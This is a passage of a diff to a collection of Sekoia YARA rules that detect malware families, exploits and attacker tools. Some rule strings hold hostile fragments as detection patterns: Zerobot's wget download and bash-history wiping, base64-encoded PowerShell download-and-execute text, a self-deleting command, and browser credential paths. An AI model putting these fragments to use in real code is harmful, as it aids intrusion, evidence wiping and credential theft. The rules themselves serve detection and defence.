+		id = "e992d574-6a44-4bea-97e2-6d5579ce8d01"
+		date = "2022-03-28"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_tortoiseshell_imaploader.yar#L1-L19"
+		reference = "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_win_purplefox_360_tct.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "93f57940ed69145064e5153cc9b099fb9456116cae808acfb4e6f7f14003dde7"
+		logic_hash = "6b4ca65bc05ea1e8036140a62b94c8b75afe30a5e37cae9a5ae2a9c828cd6275"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251653,112 +251625,122 @@ rule SEKOIA_Apt_Tortoiseshell_Imaploader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "yandex.com"
-		$s2 = "saveImapMessage.pdb"
-		$s3 = "downloader"
-		$s4 = "MailServer.Auth"
+		$rar = "Rar!"
+		$str0 = "svchost.txt"
+		$str1 = "rundll3222.exe"
+		$str2 = "ojbkcg.exe"
 
 	condition:
-		filesize < 1MB and 3 of them
+		$rar at 0 and all of ( $str* ) and filesize > 800KB and filesize < 2800KB
 }
-rule SEKOIA_Apt_Buhtrap_Maldocx
+rule SEKOIA_Unk_Quad7_Netd_Strings : FILE
 {
 	meta:
-		description = "Detect the malicious DOCX used by Buhtrap"
+		description = "Matches netd binary"
 		author = "Sekoia.io"
-		id = "4aaba2f1-fafd-4e3f-8b18-7beda11464d1"
-		date = "2022-02-25"
+		id = "3f527f0e-c101-4356-9024-fc61aea644d1"
+		date = "2024-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_buhtrap_maldocx.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unk_quad7_netd_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "69968fa6836a71cd835f40c5168d197d3b5fc13b62791279f48a6bdeb4709bd5"
+		hash = "cdb37db4543dde5ca2bd98a43699828f"
+		logic_hash = "abd59c5fa0c4c73a2cd9a2263d5573d896c6c0d71d96bd59167b1e2d7fbf108e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<xm:macrosheet xmlns=" ascii fullword
-		$ = "CALL(\"kernel32\",\"VirtualFree"
-		$ = "CALL(\"kernel32\",\"CreateFileA"
-		$ = "CALL(\"kernel32\",\"WriteFile"
-		$ = "CALL(\"kernel32\",\"VirtualAlloc"
-		$ = "CALL(\"kernel32\",\"WinExec"
-		$ = "CALL(\"kernel32\",\"lstrcatA"
-		$ = "CALL(\"kernel32\",\"CreateFileA"
-		$ = "CALL(\"kernel32\",\"VirtualFree"
-		$ = "CALL(\"kernel32\",\"ExpandEnvironmentStringsA"
-		$ = "CALL(\"kernel32\",\"CloseHandle"
+		$ = "./netd.dat"
+		$ = "./sys.dat"
+		$ = "--conf"
+		$ = "--init"
+		$ = "--nobg"
+		$ = "Url is NULL."
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 4 of them
 }
-
-rule SEKOIA_Apt_Menupass_Maliciouslibvlc_Dll
+rule SEKOIA_Infostealer_Win_Solarmarker_Powershell : FILE
 {
 	meta:
-		description = "Detects the malicious LibVLC variants used by MenuPass"
+		description = "Finds SolarMarker PowerShell script based on characteristic strings"
 		author = "Sekoia.io"
-		id = "8b6b56f3-33b5-41cf-8bcb-e653c98718bd"
-		date = "2022-04-06"
+		id = "a2fe7f09-7134-4054-ba40-5ea66785a26d"
+		date = "2022-12-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_menupass_maliciouslibvlc_dll.yar#L3-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_solarmarker_powershell.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "de56e112a477d3a77146f1b84c8aa3e66a382a87f1492dd50aa1de9458b33717"
+		logic_hash = "32267cf7e03ed65da969aeeff5ef5d7291e47446ea11a4b391f085967e8aa67d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$fun = "function " ascii
+		$ps0 = "return -join (0..(10..30|Get-Random)|%{[char]((65..90)+(97..122)|Get-Random)})" ascii
+		$ps1 = /new-item -path \$[a-zA-Z0-9_]* -itemtype registrykey -force;/
+		$ps2 = /set-item -path \$[a-zA-Z0-9_]* -value \$[a-zA-Z0-9_]*;/
+		$str0 = "[IO.File]::WriteAllText($" ascii
+		$str1 = "CreateShortcut($env:appdata+" ascii
+		$str2 = "Registry::HKEY_CURRENT_USER\\Software\\Classes\\" ascii
+		$str3 = "New-Object System.Security.Cryptography.AesCryptoServiceProvider" ascii
+		$str4 = "[Convert]::FromBase64String([IO.File]::ReadAllText(" ascii
+
 	condition:
-		pe.DLL and pe.number_of_exports < 15 and for all i in ( 0 .. pe.number_of_exports - 1 ) : ( pe.export_details [ i ] . name contains "libvlc_" )
+		$fun at 0 and 1 of ( $ps* ) and 2 of ( $str* )
 }
-rule SEKOIA_Apt_Muddywater_Powgoop_Decoded : FILE
+rule SEKOIA_Win_Malware_Statc_Downloader : FILE
 {
 	meta:
-		description = "Detects decoded PowGoop malware"
+		description = "Statc Downloader powershell script. Base64 powershell"
 		author = "Sekoia.io"
-		id = "194cb9ef-da96-42b6-a3b5-b0aee7495f2c"
-		date = "2022-01-13"
+		id = "4a2e9607-635b-4cd8-ba27-d70e0c76fd45"
+		date = "2023-08-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_powgoop_decoded.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_malware_statc_downloader.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6654d8107bb2ad6344f1fa03c6525ed9a0b8e49627787355efe857e80a02eca4"
+		hash = "173ea5af2e71b6ed70abd52a5d2f4de040393a6d2ff4978bbb6e73d96742b010"
+		logic_hash = "a99970a6ace88234e5e2bda009f8d87e6a0dc8c1a4655cca128e30292a21502c"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$h1 = "[System.Net.WebRequest]::Create(" ascii wide
-		$h2 = "Headers.Add('Authorization'" ascii wide
-		$h3 = "Headers.Add('Cookie',('value=' + $ec + ';')" ascii wide
-		$h4 = ".GetResponse()" ascii wide
-		$h5 = "GetResponseStream()" ascii wide
-		$c1 = "return (65..90) + (97..122) | Get-Random -Count" ascii wide
-		$c2 = "% {[char]$_}" ascii wide
+	strings:
+		$powershell = "powershell.exe"
+		$a1 = "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8A"
+		$a2 = "gATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwAHMAOgAvA"
+		$a3 = "oAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACIAaAB0AHQAcABzADoALw"
+		$b1 = "aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACAAIgAkAGUAbgB2ADoAVABFAE0AUABc"
+		$b2 = "kAbgB2AG8AawBlAC0AZQB4AHAAcgBlAHMAcwBpAG8AbgAgACIAJABlAG4AdgA6AFQARQBNAFAAX"
+		$b3 = "pAG4AdgBvAGsAZQAtAGUAeABwAHIAZQBzAHMAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAF"
+		$c1 = "MQAgADEAIgA7ACAAIgBPAEsAIgA7"
+		$c2 = "EAIAAxACIAOwAgACIATwBLACIAO"
+		$c3 = "xACAAMQAiADsAIAAiAE8ASwAiAD"
 
 	condition:
-		filesize > 1KB and filesize < 1MB and ( $h2 in ( @h1 .. @h5 ) and $h3 in ( @h1 .. @h5 ) and $h4 in ( @h1 .. @h5 ) ) or ( $c2 in ( @c1 .. @c1 + 50 ) ) and true
+		$powershell at 0 and 1 of ( $a* ) and 1 of ( $b* ) and 1 of ( $c* ) and filesize < 1MB
 }
-rule SEKOIA_Tool_Edrsandblast_Cli_Strings : FILE
+rule SEKOIA_Apt_Evasive_Panda_Downloader_Certificate_Exe : FILE
 {
 	meta:
-		description = "Detects EDRSandblast CLI strings"
+		description = "Detects downloader used by Evasive Panda (certificate.exe)"
 		author = "Sekoia.io"
-		id = "baf3c68a-1d28-464e-8240-28cc66c8c151"
-		date = "2024-01-08"
+		id = "1b40fca9-04b1-46b3-b48c-5a148a1b36b9"
+		date = "2024-03-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_edrsandblast_cli_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_evasive_panda_downloader_certificate_exe.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "dd6b3836b2f368c8d0ed06770f2469ef70d850ae1a9da26c7835f1877379efe9"
+		logic_hash = "38115b463378f58035a0ef0536a6af4adbec7c275164758d312e95300670b695"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251766,108 +251748,111 @@ rule SEKOIA_Tool_Edrsandblast_Cli_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[!] LSASS dump might fail if RunAsPPL" wide
-		$ = "[!] You did not provide at least one option between" wide
-		$ = "[+] Detecting userland hooks in all loaded DLLs" wide
-		$ = "[+] Saving them to the CSV file" wide
+		$s1 = {C6 45 D4 44 C6 45 D5 74 C6 45 D6 7C C6 45 D7 74 C6 45 D8 79}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Unknown_Sessionmanageriis_Strings : FILE
+rule SEKOIA_Apt_Lazarus_Dll_C2_Comms : FILE
 {
 	meta:
-		description = "Detects the IIS SessionManager backdoor"
+		description = "Detects DLL communicating with the C2"
 		author = "Sekoia.io"
-		id = "7d55dd82-509f-444d-a1ba-6417b51f392f"
-		date = "2022-07-04"
+		id = "9b379aa8-77ce-4c76-ab13-05e35ebfbdfe"
+		date = "2023-04-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unknown_sessionmanageriis_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_dll_c2_comms.yar#L1-L33"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b1058b07c8e40431f8f3841b5ad49b4d6ead21a91d014f24c083f37eeacc5ac5"
+		logic_hash = "b5ba5ae25822cf54d530d1a18c8196194d44e4fd76be1a0bf98c193772286282"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e"
+		hash2 = "bb1066c1ca53139dc5a2c1743339f4e6360d6fe4f2f3261d24fc28a12f3e2ab9"
+		hash3 = "dca33d6dacac0859ec2f3104485720fe2451e21eb06e676f4860ecc73a41e6f9"
+		hash4 = "69dd140f45c3fa3aaa64c69f860cd3c74379dec37c46319d7805a29b637d4dbf"
 
 	strings:
-		$ = "Wokring OK"
-		$ = "Delete File Success :"
-		$ = "Delete File Error :"
-		$ = "SM_SESSION="
-		$ = "SM_SESSIONID"
-		$ = "attachment; filename ="
-		$ = "CHttpModule::"
+		$x1 = "vG2eZ1KOeGd2n5fr" ascii fullword
+		$s1 = "Windows %d(%d)-%s" ascii fullword
+		$s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" wide fullword
+		$op1 = {B8 C8 00 00 00 83 FB 01 44 0F 47 E8 41 8B C5 48 8B B4 24 E0 18 00 00 4C 8B A4 24 E8 18 00 00 48 8B 8D A0 17 00 00 48 33 CC}
+		$op2 = {33 D2 46 8D 04 B5 00 00 00 00 66 0F 1F 44 00 00 49 63 C0 41 FF C0 8B 4C 84 70 31 4C 94 40 48 FF C2}
+		$op3 = {89 5C 24 50 0F 57 C0 C7 44 24 4C 04 00 00 00 C7 44 24 48 40 00 00 00 0F 11 44 24 60 0F 11 44 24 70 0F 11 45 80 0F 11 45 90}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 100KB and filesize < 400KB and 4 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and ( filesize < 500KB and ( 1 of ( $x* ) or 2 of them ) or ( $x1 and 1 of ( $s* ) or 3 of them ) )
 }
-rule SEKOIA_Guloader_Vbscript : FILE
+
+rule SEKOIA_Apt_Lazarus_Gopuram_Backdoor : FILE
 {
 	meta:
-		description = "visual basic script delivering GuLoader"
+		description = "Detects Gopuram Backdoor"
 		author = "Sekoia.io"
-		id = "3472e403-b1e6-4fdf-9770-af42d505b556"
-		date = "2024-02-07"
+		id = "947d4ee3-79fa-450b-8482-beafe607baae"
+		date = "2023-04-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_vbscript.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_gopuram_backdoor.yar#L3-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d0398b19ec57cff8afd52b06dc9da18788b1eefdf6be70650138e9b342d91d24"
+		logic_hash = "c019b65d28a7b0edf408a1a159a7535e7e14593bbd42c8df3201108ed02f96c0"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
+		hash2 = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
 
 	strings:
-		$s1 = " = CreateObject(\"WScript.Shell\")"
-		$s2 = " = Join("
-		$s3 = ",vbnullstring)"
+		$x1 = "%s\\config\\TxR\\%s.TxR.0.regtrans-ms"
+		$xop = {D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE}
+		$opa1 = {48 89 44 24 ?? 45 33 C9 45 33 C0 33 D2 89 5C 24 ?? 48 89 74 24 ?? 48 89 5C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 44 8D 43 ??}
+		$opa2 = {48 89 B4 24 ?? ?? ?? ?? 44 8D 43 ?? 33 D2 48 89 BC 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 45 33 C0 33 D2 8B F8 E8 ?? ?? ?? ?? 8D 4F ?? E8 ?? ?? ?? ?? 4C 8B 4C 24 ?? 44 8D 43 ?? 48 8B C8 8B D7 48 8B F0 44 8B F7 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ??}
 
 	condition:
-		filesize < 20KB and all of them and #s1 > 1 and @s3- @s2 < 16
+		( uint16( 0 ) == 0x4d5a and filesize < 2MB and pe.characteristics & pe.DLL and 1 of ( $x* ) ) or all of ( $opa* )
 }
-rule SEKOIA_Apt_Kimsuky_Sharpext_Compromised_Securepreferences
+rule SEKOIA_Backdoor_Win_Feedload : FILE
 {
 	meta:
-		description = "Detects compromised Chrome SecurePreferences file"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "aeda5d15-82e1-4ffc-8252-1eb4fc78d024"
-		date = "2022-07-29"
+		id = "29cc46c4-7ed7-4a34-9749-a8ba8d37eb4c"
+		date = "2023-10-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharpext_compromised_securepreferences.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_feedload.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "662358fdb4c4cfa9984d06e391ade52e1c7a3d7b78724aea4fb0d6035fe2e7b2"
+		hash = "f251144f7ad0be0045034a1fc33fb896e8c32874e0b05869ff5783e14c062486"
+		logic_hash = "18eb3fc9b11ed21a76a2921c3d9681b09cf2f306263c2ece76c1bf4a65467777"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\"devtools\", \"tabs\", \"webNavigation\", \"webRequest\", \"webRequestBlocking\""
-		$ = "AppData\\\\Roaming"
-		$ = "https://*/*"
+		$s1 = "                                        C:\\LibreSS5\\crypto\\"
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and #s1 > 200
 }
-rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Http : FILE
+rule SEKOIA_Exploit_Linux_Eop_Pwnkit_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects Pwnkit Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "47d01ba8-9fdd-42d5-9f10-115f982dc133"
-		date = "2022-08-23"
+		id = "8637c602-62da-4983-bcb7-ba546fb2ed82"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sugardump_credentials_stealer_http.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_pwnkit_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8d1725da41704fd534d3438021a98d0fb9b9b5bfdc63cc3144c4957954be1870"
+		logic_hash = "9805cc7a6022f7a3372df5d74cef68c6fd0e51072154c82212415846f3603667"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251875,35 +251860,29 @@ rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Http : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\Google\\Chrome\\User Data" wide
-		$ = "\\DebugLogWindowsDefender.txt" wide
-		$ = "Opera Software\\Opera Stable" wide
-		$ = "Microsoft\\Edge\\User Data" wide
-		$ = "\"encrypted_key\":\"(.*?)\\" wide
-		$ = "Url:" wide
-		$ = "Username:" wide
-		$ = "Password:" wide
-		$ = "Application:" wide
-		$ = "BCrypt.BCryptDecrypt" wide
-		$ = "C:\\Users\\User\\" wide
-		$ = "_CorExeMain"
-		$ = "http://" wide
+		$ = "CHARSET=PWNKIT"
+		$ = "i/do/not/exists"
+		$ = "pwnkit/pwnkit.c"
+		$ = "/usr/bin/pkexec"
+		$ = "SHELL=pwnkit"
+		$ = "pwnkit.so"
+		$ = "./pwnkit/"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 10 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 2 of them
 }
-rule SEKOIA_Infostealer_Win_44Caliber : FILE
+rule SEKOIA_Malware_Httpshell_Strings : FILE
 {
 	meta:
-		description = "Finds samples of the 44Caliber stealer"
+		description = "Detects HTTPShell based on URL patterns"
 		author = "Sekoia.io"
-		id = "44e5bbc1-f442-47d3-8431-25182f38439d"
-		date = "2022-03-08"
+		id = "58f25666-5dc2-4f4f-9fac-fc05d1e66945"
+		date = "2024-01-08"
 		modified = "2024-12-19"
-		reference = "https://github.com/razexgod/44CALIBER"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_44caliber.yar#L1-L28"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_httpshell_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4b80d6b2116f53926897aa79a7c232413974caefaf524f50e6a7cede11f3aaa0"
+		logic_hash = "8f6f6ad459cc6edd80432528a507ca2cb84e6859be94f2e1caaea801bf809375"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251911,33 +251890,28 @@ rule SEKOIA_Infostealer_Win_44Caliber : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "44 CALIBER" fullword ascii
-		$str1 = "https://api.vimeworld.ru/user/name/" wide
-		$str2 = "https://freegeoip.app/xml/" wide
-		$str3 = "SOFTWARE\\Wow6432Node\\Valve\\Steam" wide
-		$str4 = "VPN\\NordVPN\\\\accounts.txt" wide
-		$str5 = "OpenVPN Connect\\profiles" wide
-		$str6 = "FuckTheSystem Copyright" wide
-		$str7 = "lolz.guru" wide
-		$str8 = "xss.is" wide
-		$str9 = "Test message recieved successfully! :raised_hands:" wide
-		$str10 = "Specify a single character: either D or F" wide
+		$ = "/api/v1/Client/Info" wide ascii
+		$ = "/api/v1/Client/Download" wide ascii
+		$ = "/api/v1/Client/Upload" wide ascii
+		$ = "/api/v1/Client/Info" base64 base64wide
+		$ = "/api/v1/Client/Download" base64 base64wide
+		$ = "/api/v1/Client/Upload" base64 base64wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 9 of ( $str* ) and filesize > 100KB and filesize < 1MB
+		3 of them and filesize < 5MB
 }
-rule SEKOIA_Tool_Revsocks_Strings : FILE
+rule SEKOIA_Rat_Win_Asbit : FILE
 {
 	meta:
-		description = "Detects revsocks client"
+		description = "Finds Asbit samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "f5f34e74-0795-4c81-a385-218a8197a0b7"
-		date = "2024-03-07"
+		id = "b2d60eff-3dc8-4857-a0ea-d4fcd34c40bc"
+		date = "2022-09-19"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_revsocks_strings.yar#L1-L25"
+		reference = "https://blogs.juniper.net/en-us/threat-research/asbit-an-emerging-remote-desktop-trojan"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_asbit.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f1702aaaebc1ba720f688f0694a69fef55a2556b1f07dd4b846be1ae32ff5529"
+		logic_hash = "1362ebe89a4d2645eb687d92510daa355a16f05da7f5513817f8439f29722827"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251945,27 +251919,25 @@ rule SEKOIA_Tool_Revsocks_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "reverse socks5 server/client by kost" ascii fullword
-		$ = "github.com/kost/"
-		$ = "revsocks -listen"
-		$ = "Start on the DNS server: revsocks -dns"
-		$ = "crypto/aes."
+		$str01 = "/build?project=libexpat&_={0}" wide
+		$str02 = "/resolve?name={0}&short=true&_={1}" wide
+		$str03 = "/c ping 127.0.0.1 & del {0} /q & del /a:H {0} /q" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint32be( 0 ) == 0xCFFAEDFE ) and 3 of them
+		uint16( 0 ) == 0x5A4D and 1 of them
 }
-rule SEKOIA_Bot_Lin_Zerobot_Dec22 : FILE
+rule SEKOIA_Tool_Paexec_Strings : FILE
 {
 	meta:
-		description = "Detect the linux Zerobot implant using specific strings"
+		description = "Detects PAExec based on strings"
 		author = "Sekoia.io"
-		id = "ce028297-a526-4a6a-95db-8762fb5895f6"
-		date = "2022-08-05"
+		id = "c48b897c-0d88-4fa9-b64b-0e14a38a62d7"
+		date = "2022-09-23"
 		modified = "2024-12-19"
-		reference = "https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_zerobot_dec22.yar#L1-L30"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_paexec_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0f4faba9873fa360615b20bc637ecb40f56e6c7f65153f61a762e378320f94c1"
+		logic_hash = "9c3bae822fd317bdc89c07542b05f6255d6af214071194570500eb2a12924ff6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251973,102 +251945,113 @@ rule SEKOIA_Bot_Lin_Zerobot_Dec22 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "rm -rf "
-		$str02 = "wget http://"
-		$str03 = "curl -O http://"
-		$str04 = "tftp"
-		$str05 = "-c get"
-		$str06 = "ftpget -v -u anonymous -P"
-		$str07 = "chmod 777"
-		$str08 = "nohup"
-		$str09 = "/dev/null 2>&1 &"
-		$str10 = "zero."
-		$str11 = "ppc64le"
-		$str12 = "riscv64"
-		$str13 = "s390x"
-		$str14 = "rm -rf ~/.bash_history"
-		$str15 = "history -c"
+		$ = "\\\\%s\\%s\\PAExec_Move%u.dat" wide
+		$ = "PAExec_Move%u.dat" wide
+		$ = "Usage: PAExec [\\\\computer[,computer2[,...]]" wide
+		$ = "PAExec returning exit code %d" wide
 
 	condition:
-		11 of ( $str* ) and filesize < 10KB
+		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 500KB
 }
-rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Downloader : FILE
+rule SEKOIA_Infostealer_Win_Stealc : FILE
 {
 	meta:
-		description = "Detects VHD ransomware downloader"
+		description = "Find standalone Stealc sample based on decryption routine or characteristic strings"
 		author = "Sekoia.io"
-		id = "edcc9df8-650c-437a-adb8-a671e8b75e64"
-		date = "2022-11-28"
+		id = "aa78772e-9b31-40f3-84f4-b8302ea63a28"
+		date = "2023-02-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
